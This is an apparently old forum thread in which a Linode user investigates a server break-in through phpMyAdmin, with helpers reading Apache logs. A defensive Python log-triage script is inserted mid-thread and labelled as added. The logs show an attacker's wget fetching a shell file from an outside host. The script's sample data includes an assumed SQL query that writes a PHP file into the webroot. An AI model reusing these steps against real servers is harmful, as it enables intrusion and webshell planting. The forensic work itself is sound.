Someone set up an FTP site on my Linode.

Hello,

It looks like someone decided to exploit something on my system and set up an FTP site. Must have killed them with the small space. Regardless, it appears that they exploited it somehow using the www-data user that Debian set up. I am running testing. Does anyone know what could have been used to open the exploit? I want to patch it ASAP.

Thanks!

15 Replies

> @tavella81:
>
> Hello,
>
> It looks like someone decided to exploit something on my system and set up an FTP site. Must have killed them with the small space. Regardless, it appears that they exploited it somehow using the www-data user that Debian set up. I am running testing. Does anyone know what could have been used to open the exploit? I want to patch it ASAP.
>
> Thanks!

What web applications you have on your website? One of them may have a vulnerability some attacker used to gain access to your Linode.

I'm thinking it was phpmyadmin that allowed it. There was a file named old.php with mysql/mysql as the owner. I've removed it now. It looks like the person was using quite a few tools to mess with my system. I'm an idiot. Oh well… live and learn. I guess the best part is I have the IPs of the person who created/accessed it and all of the people who were downloading the software off of my system. I think I'm going to contact their ISPs.

> @tavella81:
>
> I'm thinking it was phpmyadmin that allowed it. There was a file named old.php with mysql/mysql as the owner. I've removed it now. It looks like the person was using quite a few tools to mess with my system. I'm an idiot. Oh well… live and learn. I guess the best part is I have the IPs of the person who created/accessed it and all of the people who were downloading the software off of my system. I think I'm going to contact their ISPs.

Review your webserver logs, see what they did. I'd love to know what they exploited. I'm willing to spend a few minutes and review your webserver logs if you want.

Thanks. I'll post them… I'll tar the entire package

http://www.avella.name/hack.tar

The tar is almost 26 megs. It includes their little toolkit. I found it because I did a ps -ax like I normally do and saw ./ftpd running… First clue that wasn't me…. Thanks!

Oh! the old.php was in my /var/www directory with the owner of mysql:mysql

```
[Fri Dec 30 19:22:42 2005] [error] [client 84.159.66.132] File does not exist: /var/www/avella/phpmyadmin/css/themes, referer: http://www.avella.name/phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&js_frame=right&js_isDOM=1
--19:22:59--  http://mitglied.lycos.de/oldmeal1/shell.txt
           => `shell.txt'
Resolving mitglied.lycos.de... 212.78.204.20
Connecting to mitglied.lycos.de|212.78.204.20|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5,211 (5.1K) [text/plain]

    0K .....                                                 100%   34.71 KB/s

19:23:00 (34.71 KB/s) - `shell.txt' saved [5211/5211]
```

That's from your error log, can you tar up (and gzip please) your access log for 12/30/2005?

Looks like they were transferring this game through your Linode:

http://www.torrentz.com/torrent_381534.html

They may have exploited some portion of MySQL through phpMyAdmin, using a database called remoteshell:

```
84.159.66.132 - - [30/Dec/2005:19:21:57 -0500] "GET /phpmyadmin/sql.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=remoteshell&goto=db_details_structure.php&sql_query=DROP+DATABASE+%60remoteshell%60&zero_rows=Datenbank+%60remoteshell%60+wurde+gel%C3%B6scht.&goto=main.php&back=db_details_structure.php&reload=1&purge=1&is_js_confirmed=1 HTTP/1.1" 200 6635 "http://www.avella.name/phpmyadmin/db_details_structure.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=remoteshell" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5"
```

Then they restored a database dump via POST:

```
84.159.66.132 - - [30/Dec/2005:19:22:20 -0500] "POST /phpmyadmin/read_dump.php HTTP/1.1" 200 4760 "http://www.avella.name/phpmyadmin/db_details.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=mysql&goto=db_details_structure.php&db_query_force=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5"
```

And they did another database dump via POST, which somehow resulted in /old.php getting created.

Because access logs don't log POST data, I can't tell exactly what happened, but I can make an educated guess. The above wget command in the error logs was probably caused by phpmyadmin.css.php mis-parsing the contents of a database in MySQL. It looks like it may have made PHP execute some PHP code that resided in the remoteshell database.

Can you dump that database to a text file if you've still got it?

[will edit later with more info dug up]

Can you dump the remoteshell mysql database to a text file using mysqldump?
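The log review above is done by eye; the following is an added example, not code from the thread or from Linode, that does the same triage over combined-format access log lines: it decodes each phpMyAdmin query string, flags SQL that can read or write files on the host (INTO OUTFILE, LOAD_FILE, LOAD DATA) or create/drop databases, flags any POST to phpMyAdmin because the body is not logged, and counts hits per client address. It also lists files under the webroot whose owner differs from the directory's owner, which is how old.php (owned by mysql) stood out. The sample log lines are constructed to mirror the thread's entries; the INTO OUTFILE line is an assumed query that would explain a mysql-owned PHP file, not something the thread shows, and the trusted_ips and webroot parameters are this example's own.

```python
import re
from pathlib import Path
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format, the layout of the access-log lines above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# SQL a database account can use to read or write host files, or to set up a
# scratch database for that purpose. Writing a PHP file into the webroot with
# INTO OUTFILE is the usual way phpMyAdmin access becomes a shell owned by the
# mysql user; the thread shows only the outcome, so that link is an assumption.
DANGEROUS_SQL = re.compile(
    r'\b(?:INTO\s+(?:OUT|DUMP)FILE\b|LOAD_FILE\s*\(|LOAD\s+DATA\b'
    r'|CREATE\s+DATABASE\b|DROP\s+DATABASE\b)',
    re.I,
)


def parse_line(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    url = urlsplit(rec['target'])
    rec['path'] = url.path
    rec['params'] = parse_qs(url.query)  # values are percent- and plus-decoded
    return rec


def suspicious_requests(lines, trusted_ips=(), webroot='/var/www'):
    """Flag phpMyAdmin requests carrying dangerous SQL, naming the webroot,
    or sent as POST (whose body the access log never records)."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec['ip'] in trusted_ips:
            continue
        if '/phpmyadmin/' not in rec['path'].lower():
            continue
        reasons = set()
        for values in rec['params'].values():
            for value in values:
                hit = DANGEROUS_SQL.search(value)
                if hit:
                    reasons.add('sql:' + ' '.join(hit.group(0).split()).upper())
                if webroot in value:
                    reasons.add('path:' + webroot)
        if rec['method'] == 'POST':
            reasons.add('post:body-not-logged')
        if reasons:
            findings.append({'ip': rec['ip'], 'ts': rec['ts'],
                             'method': rec['method'], 'path': rec['path'],
                             'reasons': sorted(reasons)})
    return findings


def summarize(findings):
    """Count flagged requests per client address."""
    counts = {}
    for f in findings:
        counts[f['ip']] = counts.get(f['ip'], 0) + 1
    return counts


def foreign_owned_files(webroot, expected_uid):
    """Files under webroot not owned by expected_uid (e.g. old.php owned by mysql)."""
    hits = []
    for p in Path(webroot).rglob('*'):
        st = p.lstat()
        if st.st_uid != expected_uid:
            hits.append((str(p), st.st_uid))
    return sorted(hits)


# Constructed sample lines modelled on the thread's entries.
SAMPLE_LOG = [
    '84.159.66.132 - - [30/Dec/2005:19:21:57 -0500] "GET /phpmyadmin/sql.php?lang=de-utf-8&server=1&db=remoteshell&sql_query=DROP+DATABASE+%60remoteshell%60&is_js_confirmed=1 HTTP/1.1" 200 6635 "http://www.avella.name/phpmyadmin/db_details_structure.php?db=remoteshell" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5"',
    '84.159.66.132 - - [30/Dec/2005:19:22:20 -0500] "POST /phpmyadmin/read_dump.php HTTP/1.1" 200 4760 "http://www.avella.name/phpmyadmin/db_details.php?db=mysql" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5"',
    # Assumed, not from the thread: a file-write query sent via GET.
    '84.159.66.132 - - [30/Dec/2005:19:22:40 -0500] "GET /phpmyadmin/sql.php?db=remoteshell&sql_query=SELECT+code+FROM+shell+INTO+OUTFILE+%27%2Fvar%2Fwww%2Fold.php%27 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # Ordinary visitor, not flagged.
    '192.0.2.10 - - [30/Dec/2005:19:25:01 -0500] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    found = suspicious_requests(SAMPLE_LOG)
    for f in found:
        print(f['ip'], f['ts'], f['method'], f['path'], ', '.join(f['reasons']))
    print(summarize(found))
    root = Path('/var/www')
    if root.is_dir():  # only meaningful on the affected host
        print(foreign_owned_files(root, root.stat().st_uid))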

I've never done it before but I'll give it a try…. hold.

```
Starting MySQL database server: mysqld...failed.
Please take a look at the syslog.
/usr/bin/mysqladmin: connect to server at 'localhost' failed
error: 'Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)'
Check that mysqld is running and that the socket: '/var/run/mysqld/mysqld.sock' exists!
```

I rebooted my system to make sure that no other programs were running that I wasn't aware of…

If you have an idea as to how to restore the MySQL server, I'll give the dump. I'm off to bed right now since I have to be at work in 5 hours. Thanks for your help and I'll follow up tomorrow.

It looks like mysqld isn't running. Try starting it via /etc/init.d/mysqld start (if you're running a SysV style distro)

```
mysqldump -u root -p remoteshell > remoteshell.txt
```

(then enter your root MySQL password at the prompt)

I suffered a similar problem recently which kept killing my MySQL server.

Fortunately it restarted with a reboot.

I found a directory under /var/tmp/ that had no name but appeared to contain some sort of pseudo server.

It may be worth checking for this folder.

I checked the folder and kept all of the info. When I run /etc/init.d/mysql start I receive the message above. If I type just mysqld I get the following:

```
avella:~# mysqld
060103 19:13:11  InnoDB: Database was not shut down normally!
InnoDB: Starting crash recovery.
InnoDB: Reading tablespace information from the .ibd files...
InnoDB: Restoring possible half-written data pages from the doublewrite
InnoDB: buffer...
060103 19:13:12  InnoDB: Starting log scan based on checkpoint at
InnoDB: log sequence number 0 47300.
InnoDB: Doing recovery: scanned up to log sequence number 0 47346
InnoDB: Last MySQL binlog file position 0 79, file name /var/log/mysql/mysql-bin.000121
060103 19:13:12  InnoDB: Flushing modified pages from the buffer pool...
060103 19:13:12  InnoDB: Started; log sequence number 0 47346
060103 19:13:12 [ERROR] Fatal error: Can't open and lock privilege tables: Table 'mysql.host' doesn't exist
```

I'm lost… I don't want to potentially lose what they posted. How can I go about restoring my data?

> @tavella81:
>
> I've never done it before but I'll give it a try…. hold.
>
> Starting MySQL database server: mysqld...failed.
> Please take a look at the syslog.
> /usr/bin/mysqladmin: connect to server at 'localhost' failed
> error: 'Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)'
> Check that mysqld is running and that the socket: '/var/run/mysqld/mysqld.sock' exists!
>
> I rebooted my system to make sure that no other programs were running that I wasn't aware of…
>
> If you have an idea as to how to restore the MySQL server, I'll give the dump. I'm off to bed right now since I have to be at work in 5 hours. Thanks for your help and I'll follow up tomorrow.

Did you do "apt-get upgrade" recently? If so, check if /lib/tls exists. That is evil. You've got to watch for it when you do an upgrade and remove it every time it shows up again.

I moved /lib/tls to /lib/tls-disabled, ran ldconfig, rebooted, but it still didn't work. I did mysql_install_db to restore the database but lost all of my settings. Oh well…
